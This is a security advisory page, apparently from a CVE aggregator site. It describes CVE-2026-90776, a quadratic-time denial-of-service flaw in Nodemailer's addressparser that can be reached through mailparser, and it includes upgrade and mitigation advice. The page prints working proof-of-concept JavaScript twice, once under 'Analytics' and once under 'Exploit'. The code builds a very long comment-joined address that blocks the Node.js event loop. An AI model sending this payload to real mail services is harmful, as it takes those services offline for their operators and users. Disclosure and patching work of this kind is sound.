Nodemailer / Mailparser, Quadratic Time Complexity DoS, CVE-2026-90776 (High) -DC-Sep2026-2658

Listen to this Post

CVE-2026-90776 is a quadratic time complexity vulnerability in the `addressparser` component of Nodemailer, a widely used email library for Node.js. The flaw affects Nodemailer versions 9.1.0 through 10.0.4 and can be triggered remotely without authentication when the library processes attacker-controlled email address headers. The vulnerability resides in the parser’s handling of RFC 5322 comments, which allow comments to be inserted between atoms of an email address. When atoms are separated by comments, such as a@b(c)@b(c)@b(c)..., the parser accumulates these atoms into a single growing string. A specific join check in `src/addressparser/index.ts` evaluates operands in a left-to-right order that prioritizes an expensive operation over a cheap one. The code checks `parts[parts.length – 1].slice(-1)` before token.value.charAt(0). The `slice(-1)` call must flatten the entire accumulator string to read its last character, an operation with O(current length) cost. Because this expensive check runs on every token, the overall parsing time becomes O(n²) relative to the address value length. A single address value of approximately 640 KB blocks the Node.js event loop for roughly 7 seconds. Since Node.js is single-threaded, this block stalls all other operations in the process. The vulnerability is reachable through `mailparser` version 3.9.24, which pins Nodemailer 10.0.3 and feeds inbound To, From, and `Cc` headers directly into the vulnerable parser without a length cap. An attacker can deliver a standards-compliant email with folded headers under 998 octets that still triggers the quadratic behavior. A handful of such emails sent back-to-back can keep a mail-parsing service down. The fix involves swapping the last two operands in the join check to allow the cheap `charAt(0)` check to short-circuit before the expensive `slice(-1)` call.

DailyCVE Form:

Platform: Nodemailer / Mailparser
Version: 9.1.0 – 10.0.4
Vulnerability: Quadratic Addressparser DoS
Severity: High (7.5)
date: 2026-09-13

Prediction: 2026-09-11

What Undercode Say:

Analytics:

npm i [email protected]
const addressparser = require('nodemailer/lib/addressparser');
const s = Date.now();
addressparser('a' + '@b(c)'.repeat(130000));
console.log(Date.now() - s, 'ms'); // ~7000 ms, blocking
npm i [email protected]
const { simpleParser } = require('mailparser');
(async () => {
const to = 'a' + '@b(c)'.repeat(130000);
const eml = <code>From: [email protected]\r\nTo: ${to}\r\nSubject: x\r\n\r\nhi\r\n</code>;
const s = Date.now();
await simpleParser(eml);
console.log(Date.now() - s, 'ms'); // ~7000 ms, blocking
})();

Exploit: (Educational Purposes!)

// Isolated parser DoS
const addressparser = require('nodemailer/lib/addressparser');
addressparser('a' + '@b(c)'.repeat(130000));
// Remote unauthenticated DoS via mailparser
const { simpleParser } = require('mailparser');
const to = 'a' + '@b(c)'.repeat(130000);
const eml = <code>From: [email protected]\r\nTo: ${to}\r\nSubject: x\r\n\r\nhi\r\n</code>;
simpleParser(eml);

Protection:

Upgrade Nodemailer to version 10.0.5 or later, which parses comment-joined addresses in linear time. If immediate upgrade is not possible, enforce a maximum length limit on email address headers before passing them to the parser.

Impact:

Algorithmic-complexity denial of service. A single crafted email can block the Node.js event loop for several seconds, causing service unavailability. High-throughput environments are particularly vulnerable, as multiple malicious emails can cause cascading failures across dependent services.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top